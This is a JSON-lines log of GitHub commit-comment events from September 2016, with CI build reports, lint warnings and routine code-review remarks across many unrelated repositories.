{"id":"4542784218","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18970948,"position":null,"line":null,"path":null,"commit_id":"1dc38c5553eec97859a55304c6e9e2fcd7b8865c","created_at":"2016-09-09T22:33:34Z","updated_at":"2016-09-09T22:33:34Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-1dc38c5553eec97859a55304c6e9e2fcd7b8865c-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-1dc38c5553eec97859a55304c6e9e2fcd7b8865c-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T22:33:34Z"}
{"id":"4542785288","type":"CommitCommentEvent","actor":{"login":"gcanti"},"repo":{"name":"gcanti/flow-static-land"},"payload":{"comment":{"id":18970954,"position":87,"line":107,"path":"README.md","commit_id":"16a84aad3825cfe34868e87665677a29d18f8a1e","created_at":"2016-09-09T22:33:52Z","updated_at":"2016-09-09T22:33:52Z","body":"If I add to my `index.js`\r\n\r\n```js\r\n/* @flow */\r\n\r\nimport * as maybe from 'flow-static-land/Maybe'\r\n```\r\n\r\nthen I get a small 9.32 kB bundle. Opening the bundle I see `HKT.js`, `Maybe.js` and `Identity.js` included (as expected)"}},"created_at":"2016-09-09T22:33:52Z"}
{"id":"4542787830","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18970957,"position":null,"line":null,"path":null,"commit_id":"cc17fee9d5cd3fd4ae41fb6f98e2dd2763185537","created_at":"2016-09-09T22:34:35Z","updated_at":"2016-09-09T22:34:35Z","body":"This is a bold attempt ! Good luck !"}},"created_at":"2016-09-09T22:34:35Z"}
{"id":"4542789006","type":"CommitCommentEvent","actor":{"login":"agentlame"},"repo":{"name":"creesch/userscripts"},"payload":{"comment":{"id":18970963,"position":6,"line":16,"path":"irccloud.user.js","commit_id":"f0547c6a1449d62d7efd274dbcbc2ea30cfe6d21","created_at":"2016-09-09T22:34:57Z","updated_at":"2016-09-09T22:34:57Z","body":"$(this).$(this).$(this).$(this).$(this).$(this).$(this)"}},"created_at":"2016-09-09T22:34:57Z"}
{"id":"4542795857","type":"CommitCommentEvent","actor":{"login":"behlendorf"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18970985,"position":80,"line":596,"path":"master/master.cfg","commit_id":"72e6b8b0f6fbb6688ef9c2272333367474b24637","created_at":"2016-09-09T22:37:05Z","updated_at":"2016-09-09T22:37:05Z","body":"I'd suggest dropping \"Tests\" from perf_tags.  I think the overlap here would be confusing."}},"created_at":"2016-09-09T22:37:05Z"}
{"id":"4542797386","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18970988,"position":null,"line":null,"path":null,"commit_id":"25d44cf279bbedab06154ec45d32d37e8311c46a","created_at":"2016-09-09T22:37:32Z","updated_at":"2016-09-09T22:37:32Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [source/_partials/footer_scripts.html](https://github.com/pantheon-systems/documentation/commit/25d44cf279bbedab06154ec45d32d37e8311c46a/source/_partials/footer_scripts.html)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/25d44cf279bbedab06154ec45d32d37e8311c46a/source/docs/assets/js/main.js)\n- [source/docs/assets/terminuscommands.json](https://github.com/pantheon-systems/documentation/commit/25d44cf279bbedab06154ec45d32d37e8311c46a/source/docs/assets/terminuscommands.json)\n"}},"created_at":"2016-09-09T22:37:32Z"}
{"id":"4542798106","type":"CommitCommentEvent","actor":{"login":"sociality"},"repo":{"name":"sociality/sociality"},"payload":{"comment":{"id":18970989,"position":null,"line":null,"path":null,"commit_id":"8648e221fe22aed18f1f2cf2e1647c13abbc0d71","created_at":"2016-09-09T22:37:44Z","updated_at":"2016-09-09T22:37:44Z","body":"Integrated with Xcode workflow"}},"created_at":"2016-09-09T22:37:44Z"}
{"id":"4542798596","type":"CommitCommentEvent","actor":{"login":"robertsimoes"},"repo":{"name":"robertsimoes/Flow"},"payload":{"comment":{"id":18970992,"position":null,"line":null,"path":null,"commit_id":"9458961a46297924f779b23cdc67d08da1f0f898","created_at":"2016-09-09T22:37:53Z","updated_at":"2016-09-09T22:37:53Z","body":"final v0.7 commit"}},"created_at":"2016-09-09T22:37:53Z"}
{"id":"4542799230","type":"CommitCommentEvent","actor":{"login":"surajrav"},"repo":{"name":"freenas/freenas-pkgtools"},"payload":{"comment":{"id":18970993,"position":31,"line":3462,"path":"freenas-release/freenas-release.py","commit_id":"790eb9c20ce527c1ffa0b74161fab3134abe4d5a","created_at":"2016-09-09T22:38:04Z","updated_at":"2016-09-09T22:38:04Z","body":"why import this again? It is already imported at the top"}},"created_at":"2016-09-09T22:38:04Z"}
{"id":"4542804839","type":"CommitCommentEvent","actor":{"login":"wolf31o2"},"repo":{"name":"thedataincubator/hadoop_cookbook"},"payload":{"comment":{"id":18971012,"position":null,"line":null,"path":null,"commit_id":"53cc8c9827a981f85be51c84ba11e896c1c18658","created_at":"2016-09-09T22:39:38Z","updated_at":"2016-09-09T22:39:38Z","body":"Just curious, but why did you remove the PID creation? It's not necessary on *most* services, but some of them don't properly handle their own PID creation when launched. Could you tell me what you're doing or what symptoms you were seeing that prompted the change?"}},"created_at":"2016-09-09T22:39:38Z"}
{"id":"4542810645","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18971027,"position":null,"line":null,"path":null,"commit_id":"fa7586d7bd4e55017e63fdd955de2e4c782f2be2","created_at":"2016-09-09T22:41:12Z","updated_at":"2016-09-09T22:41:12Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2328 of 2334 tests passed, 0 test warnings)\n\n * 6 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 6 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: ESO small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa7586d7bd4e55017e63fdd955de2e4c782f2be2-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa7586d7bd4e55017e63fdd955de2e4c782f2be2-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.74%25-yellow.svg)</a> \n"}},"created_at":"2016-09-09T22:41:12Z"}
{"id":"4542811998","type":"CommitCommentEvent","actor":{"login":"damellis"},"repo":{"name":"damellis/ESP"},"payload":{"comment":{"id":18971030,"position":null,"line":null,"path":null,"commit_id":"319011486ec32fef34d0212bce1560073daca4bf","created_at":"2016-09-09T22:41:31Z","updated_at":"2016-09-09T22:41:31Z","body":"It looks like this may do unexpected things if more than one client connects and sends data at once. I'm not really sure what the right behavior is in that situation, though. To start, maybe it's fine to just say that the behavior is unexpected if more than one client connects."}},"created_at":"2016-09-09T22:41:31Z"}
{"id":"4542812718","type":"CommitCommentEvent","actor":{"login":"surajrav"},"repo":{"name":"freenas/freenas-pkgtools"},"payload":{"comment":{"id":18971033,"position":31,"line":3462,"path":"freenas-release/freenas-release.py","commit_id":"790eb9c20ce527c1ffa0b74161fab3134abe4d5a","created_at":"2016-09-09T22:41:42Z","updated_at":"2016-09-09T22:41:42Z","body":"Spoke to @kithrup about this, he says for \"some mysterious reason\" this fails without this import, still no clue why!!!!"}},"created_at":"2016-09-09T22:41:42Z"}
{"id":"4542812913","type":"CommitCommentEvent","actor":{"login":"kaets"},"repo":{"name":"0-elip/gann-robotics"},"payload":{"comment":{"id":18971034,"position":null,"line":null,"path":null,"commit_id":"972d93f020d70ff0d8facda10a77eb79e7fee3e3","created_at":"2016-09-09T22:41:45Z","updated_at":"2016-09-09T22:41:45Z","body":"I am glad"}},"created_at":"2016-09-09T22:41:45Z"}
{"id":"4542812955","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18971035,"position":29,"line":67,"path":"otrv4.md","commit_id":"a3843e02bd4c2830189b53547c402ec8362db533","created_at":"2016-09-09T22:41:45Z","updated_at":"2016-09-09T22:41:45Z","body":"I think it would be a very good idea to clearly define what is in the high level overview, security properties, and the terminology sections, so we don't have duplication. "}},"created_at":"2016-09-09T22:41:45Z"}
{"id":"4542814136","type":"CommitCommentEvent","actor":{"login":"logic-dev"},"repo":{"name":"Poniverse/PonyExpo"},"payload":{"comment":{"id":18971039,"position":null,"line":null,"path":null,"commit_id":"83cff942a930353c63f10863a8b087545258139d","created_at":"2016-09-09T22:42:05Z","updated_at":"2016-09-09T22:42:05Z","body":"Supported by the @Poniverse/meme-dream-team"}},"created_at":"2016-09-09T22:42:05Z"}
{"id":"4542814230","type":"CommitCommentEvent","actor":{"login":"Vincz"},"repo":{"name":"halt-hammerzeit/react-isomorphic-render"},"payload":{"comment":{"id":18971040,"position":null,"line":null,"path":null,"commit_id":"74970e5650028e72eec6d0fbaf37b3e278e2af5a","created_at":"2016-09-09T22:42:07Z","updated_at":"2016-09-09T22:42:07Z","body":"The import is missing:\r\n    import { normalize_common_options } from '../redux/normalize'\r\n"}},"created_at":"2016-09-09T22:42:07Z"}
{"id":"4542819809","type":"CommitCommentEvent","actor":{"login":"halt-hammerzeit"},"repo":{"name":"halt-hammerzeit/react-isomorphic-render"},"payload":{"comment":{"id":18971067,"position":null,"line":null,"path":null,"commit_id":"74970e5650028e72eec6d0fbaf37b3e278e2af5a","created_at":"2016-09-09T22:43:39Z","updated_at":"2016-09-09T22:43:39Z","body":"Fixed in `4.1.9`"}},"created_at":"2016-09-09T22:43:39Z"}
{"id":"4542820347","type":"CommitCommentEvent","actor":{"login":"halt-hammerzeit"},"repo":{"name":"halt-hammerzeit/react-isomorphic-render"},"payload":{"comment":{"id":18971069,"position":null,"line":null,"path":null,"commit_id":"74970e5650028e72eec6d0fbaf37b3e278e2af5a","created_at":"2016-09-09T22:43:48Z","updated_at":"2016-09-09T22:43:48Z","body":"@Vincz Fixed in `4.1.9`"}},"created_at":"2016-09-09T22:43:48Z"}
{"id":"4542821173","type":"CommitCommentEvent","actor":{"login":"nebgnahz"},"repo":{"name":"damellis/ESP"},"payload":{"comment":{"id":18971072,"position":null,"line":null,"path":null,"commit_id":"319011486ec32fef34d0212bce1560073daca4bf","created_at":"2016-09-09T22:44:01Z","updated_at":"2016-09-09T22:44:01Z","body":"At first I was thinking that we should restrict it to a single client but couldn't find the API from ofxNetwork. Later I thought we could limit the loop `for (int i = 0; i < server_.getLastID(); i++)` but the flexibility of stopping the client and reconnecting seems crucial for prototyping (iteration).\r\n\r\nIn the end I simply leave this as is and yes, when multiple clients connect, data will simply be merged and it's undefined behavior."}},"created_at":"2016-09-09T22:44:01Z"}
{"id":"4542826293","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"cdiener/proliferation"},"payload":{"comment":{"id":18971083,"position":null,"line":null,"path":null,"commit_id":"800c6649eaf05b600363cc43655a9739f53abe90","created_at":"2016-09-09T22:45:18Z","updated_at":"2016-09-09T22:45:18Z","body":"[R/analysis.R:33:16:](https://github.com/cdiener/proliferation/blob/800c6649eaf05b600363cc43655a9739f53abe90/R/analysis.R#L33) *warning:* **no visible global function definition for ‘data.table’**\n```r\n​        res <- data.table(rid = names(in_t), panel = pname, lfc = lfcs)\n               ^~~~~~~~~~\n```\n[R/analysis.R:38:12:](https://github.com/cdiener/proliferation/blob/800c6649eaf05b600363cc43655a9739f53abe90/R/analysis.R#L38) *warning:* **no visible global function definition for ‘rbindlist’**\n```r\n​    return(rbindlist(out))\n           ^~~~~~~~~\n```\n[R/analysis.R:88:11:](https://github.com/cdiener/proliferation/blob/800c6649eaf05b600363cc43655a9739f53abe90/R/analysis.R#L88) *warning:* **no visible global function definition for ‘ES’, Did you mean 'es'?**\n```r\n​    es <- ES(p, w, pws)\n          ^~\n```\n[R/analysis.R:89:26:](https://github.com/cdiener/proliferation/blob/800c6649eaf05b600363cc43655a9739f53abe90/R/analysis.R#L89) *warning:* **no visible global function definition for ‘ES’, Did you mean 'es'?**\n```r\n​    norm <- replicate(n, ES(p, w, sample(pws), both = TRUE))\n                         ^~\n```\n[R/exarray.R:29:11:](https://github.com/cdiener/proliferation/blob/800c6649eaf05b600363cc43655a9739f53abe90/R/exarray.R#L29) *warning:* **no visible global function definition for ‘exprs’, Did you mean 'exp'?**\n```r\n​    ex <- exprs(eset)\n          ^~~~~\n```\n[R/exarray.R:38:12:](https://github.com/cdiener/proliferation/blob/800c6649eaf05b600363cc43655a9739f53abe90/R/exarray.R#L38) *warning:* **no visible global function definition for ‘matrix_reduce’**\n```r\n​    res <- matrix_reduce(ex, idx, facs, method)\n           ^~~~~~~~~~~~~\n```\n[R/exarray.R:41:12:](https://github.com/cdiener/proliferation/blob/800c6649eaf05b600363cc43655a9739f53abe90/R/exarray.R#L41) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return(ExpressionSet(res))\n           ^~~~~~~~~~~~~\n```\n[R/exarray.R:41:12:](https://github.com/cdiener/proliferation/blob/800c6649eaf05b600363cc43655a9739f53abe90/R/exarray.R#L41) *warning:* **no visible global function definition for ‘ExpressionSet’**\n```r\n​    return(ExpressionSet(res))\n           ^~~~~~~~~~~~~\n```\n[R/RcppExports.R:5:11:](https://github.com/cdiener/proliferation/blob/800c6649eaf05b600363cc43655a9739f53abe90/R/RcppExports.R#L5) *style:* **Only use double-quotes.**\n```r\n​    .Call('prtools_matrix_reduce', PACKAGE = 'prtools', m, idx, factors, method)\n          ^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/RcppExports.R:5:46:](https://github.com/cdiener/proliferation/blob/800c6649eaf05b600363cc43655a9739f53abe90/R/RcppExports.R#L5) *style:* **Only use double-quotes.**\n```r\n​    .Call('prtools_matrix_reduce', PACKAGE = 'prtools', m, idx, factors, method)\n                                             ^~~~~~~~~\n```\n[R/zzz.R:15:37:](https://github.com/cdiener/proliferation/blob/800c6649eaf05b600363cc43655a9739f53abe90/R/zzz.R#L15) *warning:* **no visible binding for global variable ‘pkgs’, Did you mean 'png'?**\n```r\n​    is_loaded <- paste0(\"package:\", pkgs) %in% search()\n                                    ^~~~\n```\n[R/zzz.R:16:20:](https://github.com/cdiener/proliferation/blob/800c6649eaf05b600363cc43655a9739f53abe90/R/zzz.R#L16) *warning:* **no visible binding for global variable ‘pkgs’, Did you mean 'png'?**\n```r\n​    needed <- sort(pkgs[!is_loaded])\n                   ^~~~\n```\n[R/zzz.R:22:20:](https://github.com/cdiener/proliferation/blob/800c6649eaf05b600363cc43655a9739f53abe90/R/zzz.R#L22) *warning:* **no visible binding for global variable ‘silent_lib’**\n```r\n​    lapply(needed, silent_lib, character.only = TRUE, warn.conflicts = FALSE)\n                   ^~~~~~~~~~\n```\n[tests/testthat/test_exarray.R:6:13:](https://github.com/cdiener/proliferation/blob/800c6649eaf05b600363cc43655a9739f53abe90/tests/testthat/test_exarray.R#L6) *style:* **Variable and function names should be all lowercase.**\n```r\n​    eset <- ExpressionSet(m)\n            ^~~~~~~~~~~~~\n```"}},"created_at":"2016-09-09T22:45:18Z"}
{"id":"4542831826","type":"CommitCommentEvent","actor":{"login":"wolf31o2"},"repo":{"name":"yeouchien/hadoop_cookbook"},"payload":{"comment":{"id":18971096,"position":null,"line":null,"path":null,"commit_id":"a4475a223e5495d4f78b0febce9979b42db38f2f","created_at":"2016-09-09T22:46:38Z","updated_at":"2016-09-09T22:46:38Z","body":"This isn't necessary after caskdata/hadoop_cookbook#282 is merged a new cookbook is released. Anything higher than 2.6.0 of the cookbook will include a change that supersedes this one."}},"created_at":"2016-09-09T22:46:38Z"}
{"id":"4542835829","type":"CommitCommentEvent","actor":{"login":"aduriseti"},"repo":{"name":"python-progress/python-progress"},"payload":{"comment":{"id":18971105,"position":null,"line":null,"path":null,"commit_id":"4691a1efdcd8cbe4bc66d586307daf6505f21db4","created_at":"2016-09-09T22:47:44Z","updated_at":"2016-09-09T22:47:44Z","body":"Hello praiskup - was looking through your implementation of progress and your previous exchanges with verigak.  After reading through the exchange on my pull request and examining your implementation of this package - I think you might have misunderstood the problem addressed by my PR.  \r\n\r\nThe main goal of my PR was to limit the calls to the update() function - which by far dominates (I would think - I/O operations are fairly expensive w/o buffering) the runtime cost of this package.  I will be splitting my PR into two separate PR for verigak's repo - one which fixes the I/O cost problem and one which provides a more stable ETA estimate using something like your method.\r\n\r\nHopefully verigak will be more open to your ETA estimate modification this time."}},"created_at":"2016-09-09T22:47:44Z"}
{"id":"4542838720","type":"CommitCommentEvent","actor":{"login":"richsalz"},"repo":{"name":"FdaSilvaYY/openssl"},"payload":{"comment":{"id":18971113,"position":4,"line":53,"path":"crypto/blake2/m_blake2b.c","commit_id":"024bf5783300b13061e12d20ae5bbe94503fd0d1","created_at":"2016-09-09T22:48:39Z","updated_at":"2016-09-09T22:48:39Z","body":"We probably don't want this kind of fix FYI."}},"created_at":"2016-09-09T22:48:39Z"}
{"id":"4542843429","type":"CommitCommentEvent","actor":{"login":"gtaylor44"},"repo":{"name":"patil-nileshb/SqlBulkTools"},"payload":{"comment":{"id":18971119,"position":null,"line":null,"path":null,"commit_id":"c750dcc72041510da0de14510067bc0a6f23cf6b","created_at":"2016-09-09T22:50:07Z","updated_at":"2016-09-09T22:50:07Z","body":"One of the issues I've identified with an approach like this is it's open to an SQL Injection attack if your updateOn clause contains a variable from user input. "}},"created_at":"2016-09-09T22:50:07Z"}
{"id":"4542845770","type":"CommitCommentEvent","actor":{"login":"aduriseti"},"repo":{"name":"python-progress/python-progress"},"payload":{"comment":{"id":18971126,"position":null,"line":null,"path":null,"commit_id":"4691a1efdcd8cbe4bc66d586307daf6505f21db4","created_at":"2016-09-09T22:50:51Z","updated_at":"2016-09-09T22:50:51Z","body":"Anyways - the point of the above comment was to ask if you wanted also for me to create a PR for your repo.  My view is that if both my PR are accepted there is no need for this repo so I am inclined not spend time submitting one."}},"created_at":"2016-09-09T22:50:51Z"}
{"id":"4542846104","type":"CommitCommentEvent","actor":{"login":"DoctorMcKay"},"repo":{"name":"DoctorMcKay/node-steamcommunity"},"payload":{"comment":{"id":18971127,"position":null,"line":null,"path":null,"commit_id":"ce4d7ae026cd4bb978a350cd0db4b5d30f043442","created_at":"2016-09-09T22:50:58Z","updated_at":"2016-09-09T22:50:58Z","body":"As is the answer **ALWAYS**, slow down your requests."}},"created_at":"2016-09-09T22:50:58Z"}
{"id":"4542848659","type":"CommitCommentEvent","actor":{"login":"Osyx"},"repo":{"name":"anime-plus/graph"},"payload":{"comment":{"id":18971136,"position":null,"line":null,"path":null,"commit_id":"581eccb7bd1dc6fd0a365b9ed4ebbbf0d025c90e","created_at":"2016-09-09T22:51:49Z","updated_at":"2016-09-09T22:51:49Z","body":"Why did you lower the romance thresholds? Not complaining, just wondering :)"}},"created_at":"2016-09-09T22:51:49Z"}
{"id":"4542850573","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18971141,"position":null,"line":null,"path":null,"commit_id":"bc503dc74a9dbe550163e1dc5c7c688061e82357","created_at":"2016-09-09T22:52:26Z","updated_at":"2016-09-09T22:52:26Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 24](http://teamcity.otenv.com/viewLog.html?buildId=5188555&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-09T22:52:26Z"}
{"id":"4542855388","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18971153,"position":null,"line":null,"path":null,"commit_id":"bc503dc74a9dbe550163e1dc5c7c688061e82357","created_at":"2016-09-09T22:53:53Z","updated_at":"2016-09-09T22:53:53Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 24](http://teamcity.otenv.com/viewLog.html?buildId=5188555&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 28 Build time: 00:01:27"}},"created_at":"2016-09-09T22:53:53Z"}
{"id":"4542855487","type":"CommitCommentEvent","actor":{"login":"daton"},"repo":{"name":"daton/curso-ne"},"payload":{"comment":{"id":18971155,"position":null,"line":null,"path":null,"commit_id":"e3febd83f28693a92d53fac5cd5ca31d3250643e","created_at":"2016-09-09T22:53:55Z","updated_at":"2016-09-09T22:53:55Z","body":"dsdsd"}},"created_at":"2016-09-09T22:53:55Z"}
{"id":"4542859109","type":"CommitCommentEvent","actor":{"login":"comedinha"},"repo":{"name":"mattyx14/otxserver"},"payload":{"comment":{"id":18971162,"position":83,"line":921,"path":"path_10_9/src/item.cpp","commit_id":"2f3bb5a71325aeee6eb443c8e612f2a8d437d337","created_at":"2016-09-09T22:55:00Z","updated_at":"2016-09-09T22:55:00Z","body":"SKILL_CRITICAL_HIT_CHANCE is 7 and SKILL_FISHING is 6, not is possible use for (uint8_t i = SKILL_FIRST; i <= SKILL_LAST; i++) {"}},"created_at":"2016-09-09T22:55:00Z"}
{"id":"4542860664","type":"CommitCommentEvent","actor":{"login":"bwoebi"},"repo":{"name":"async-interop/event-loop-test"},"payload":{"comment":{"id":18971165,"position":null,"line":null,"path":null,"commit_id":"cf3dcf8cbfaf4d71328d2fdac5770754113db2df","created_at":"2016-09-09T22:55:26Z","updated_at":"2016-09-09T22:55:26Z","body":"Why that? The tests depend on a specific version of the event-loop and only work with the specified majors of phpunit?"}},"created_at":"2016-09-09T22:55:26Z"}
{"id":"4542863558","type":"CommitCommentEvent","actor":{"login":"aduriseti"},"repo":{"name":"python-progress/python-progress"},"payload":{"comment":{"id":18971173,"position":null,"line":null,"path":null,"commit_id":"4691a1efdcd8cbe4bc66d586307daf6505f21db4","created_at":"2016-09-09T22:56:19Z","updated_at":"2016-09-09T22:56:19Z","body":"Also I see your problems with moving update - my decision to move it was not however motivated by ETA concerns.  Will do my best to incorporate your advice into my next PR."}},"created_at":"2016-09-09T22:56:19Z"}
{"id":"4542864847","type":"CommitCommentEvent","actor":{"login":"trowski"},"repo":{"name":"async-interop/event-loop-test"},"payload":{"comment":{"id":18971176,"position":null,"line":null,"path":null,"commit_id":"cf3dcf8cbfaf4d71328d2fdac5770754113db2df","created_at":"2016-09-09T22:56:42Z","updated_at":"2016-09-09T22:56:42Z","body":"Yeah, I dunno what I was thinking, changing back and just updating to `^0.3`"}},"created_at":"2016-09-09T22:56:42Z"}
{"id":"4542866525","type":"CommitCommentEvent","actor":{"login":"cgmorton"},"repo":{"name":"cgmorton/et-demands"},"payload":{"comment":{"id":18971179,"position":null,"line":null,"path":null,"commit_id":"39d95ba819b73f060c3cb194e6b7262587a04460","created_at":"2016-09-09T22:57:14Z","updated_at":"2016-09-09T22:57:14Z","body":"Closes #18 "}},"created_at":"2016-09-09T22:57:14Z"}
{"id":"4542868853","type":"CommitCommentEvent","actor":{"login":"mbramson"},"repo":{"name":"JordiPolo/dataframe"},"payload":{"comment":{"id":18971184,"position":24,"line":34,"path":"lib/dataframe/table.ex","commit_id":"99a425d94f32644a32debb6dd7bff204024c7a1f","created_at":"2016-09-09T22:57:54Z","updated_at":"2016-09-09T22:57:54Z","body":"Have you thought about any of the performance issues with making the DataFrame be based on lists rather than tuples? In Elixir, lists are linked lists under the hood, while tuples are arrays."}},"created_at":"2016-09-09T22:57:54Z"}
{"id":"4542873179","type":"CommitCommentEvent","actor":{"login":"RogerioAzevedo"},"repo":{"name":"RogerioAzevedo/aulasextateste"},"payload":{"comment":{"id":18971204,"position":5,"line":18,"path":"WebApplication1/WebApplication1/Controllers/HomeController.cs","commit_id":"d5916bd584e4227e55ef8553544b74fae583a953","created_at":"2016-09-09T22:59:16Z","updated_at":"2016-09-09T22:59:16Z","body":"Faltou alterar o métodos Index"}},"created_at":"2016-09-09T22:59:16Z"}
{"id":"4542880764","type":"CommitCommentEvent","actor":{"login":"ChrisKenyon79"},"repo":{"name":"ChrisKenyon79/acciobike2"},"payload":{"comment":{"id":18971226,"position":null,"line":null,"path":null,"commit_id":"dddfe81c3236354255eb851559c7dbdb0183b768","created_at":"2016-09-09T23:01:27Z","updated_at":"2016-09-09T23:01:27Z","body":"push this junk"}},"created_at":"2016-09-09T23:01:27Z"}
{"id":"4542881249","type":"CommitCommentEvent","actor":{"login":"carlosfrodriguez"},"repo":{"name":"OTRS/otrs"},"payload":{"comment":{"id":18971228,"position":59,"line":646,"path":"Kernel/System/EmailParser.pm","commit_id":"28a46d10847415aea478633a8580141efd775512","created_at":"2016-09-09T23:01:35Z","updated_at":"2016-09-09T23:01:35Z","body":"Hi @mgruner,\r\n\r\nThis postfix if goes against OTRS Code style, can you please check it?\r\n\r\n((enjoy))\r\ncr"}},"created_at":"2016-09-09T23:01:35Z"}
{"id":"4542885035","type":"CommitCommentEvent","actor":{"login":"behlendorf"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18971236,"position":49,"line":352,"path":"master/master.cfg","commit_id":"72e6b8b0f6fbb6688ef9c2272333367474b24637","created_at":"2016-09-09T23:02:40Z","updated_at":"2016-09-09T23:02:40Z","body":"Make sure to add `bb-test-zfstests.sh` as a step."}},"created_at":"2016-09-09T23:02:40Z"}
{"id":"4542885038","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"B--B/Alucard-Kernel-jfltexx"},"payload":{"comment":{"id":18971237,"position":null,"line":null,"path":null,"commit_id":"3f6a972d1dca5084855788bcef363b3494fa9c8f","created_at":"2016-09-09T23:02:40Z","updated_at":"2016-09-09T23:02:40Z","body":"fs is ext4 \r\nabout logs...adb logcat immediately stops when freeze\r\nthe only log i had is kmsg ...\r\nthe proc/last_kmsg doesnt exist ( not created?)\r\nalthough...i think its not sdcardfs issue(at least its not directly this)\r\n\r\nIn optcm13 i changed gallery to aosp one.whenever i get inside of the app,i get a freeze after 10-15 sec...so i guess its the aosp gallery<->CM issue with the new driver \r\n\r\n(on latest release i still use aosps gallery and had no issues)"}},"created_at":"2016-09-09T23:02:40Z"}
{"id":"4542886002","type":"CommitCommentEvent","actor":{"login":"behlendorf"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18971239,"position":109,"line":831,"path":"master/master.cfg","commit_id":"72e6b8b0f6fbb6688ef9c2272333367474b24637","created_at":"2016-09-09T23:02:58Z","updated_at":"2016-09-09T23:02:58Z","body":"I like where you're going with this and I think we can take it farther.\r\n\r\nHow about we call this new keyword \"Requires-builders:\".  Valid values would be \"build\", \"test\", and \"perf\"."}},"created_at":"2016-09-09T23:02:58Z"}
{"id":"4542887585","type":"CommitCommentEvent","actor":{"login":"jodli"},"repo":{"name":"jodli/InsuranceV2"},"payload":{"comment":{"id":18971244,"position":54,"line":38,"path":"Source/InsuranceV2.Application/Services/NavigationAppService.cs","commit_id":"aa8c71dcba46a0c7521f2ad35208fe40ae870864","created_at":"2016-09-09T23:03:27Z","updated_at":"2016-09-09T23:03:27Z","body":"Use [IEventBus](https://github.com/jodli/InsuranceV2/blob/master/Source/InsuranceV2.Common/MVVM/IEventBus.cs).\r\n[Example](https://github.com/jodli/InsuranceV2/blob/2798aa0f2c845bb04f570ae114ec3eff43528c4a/Content/ViewModels/InsureeDetailsViewModel.cs#L90)"}},"created_at":"2016-09-09T23:03:27Z"}
{"id":"4542890818","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18971252,"position":4,"line":16,"path":"Lesson_9/classes/route/route.rb","commit_id":"64079a08946df081dcd6ea1efbf97fd6ef7d9043","created_at":"2016-09-09T23:04:25Z","updated_at":"2016-09-09T23:04:25Z","body":"Почему ты вдруг отказался от этих прекрасных методов?"}},"created_at":"2016-09-09T23:04:25Z"}
{"id":"4542895612","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18971269,"position":4,"line":4,"path":"Lesson_9/classes/train/passenger_train.rb","commit_id":"64079a08946df081dcd6ea1efbf97fd6ef7d9043","created_at":"2016-09-09T23:05:55Z","updated_at":"2016-09-09T23:05:55Z","body":"Пассажирский поезд теперь без валидаций?"}},"created_at":"2016-09-09T23:05:55Z"}
{"id":"4542898471","type":"CommitCommentEvent","actor":{"login":"Lazersmoke"},"repo":{"name":"Vazkii/Botania"},"payload":{"comment":{"id":18971280,"position":null,"line":null,"path":null,"commit_id":"07ccd7c221cbe0912e52a7ab535dd13fffe2bd25","created_at":"2016-09-09T23:06:51Z","updated_at":"2016-09-09T23:06:51Z","body":"Spaces! :smile: :laughing: "}},"created_at":"2016-09-09T23:06:51Z"}
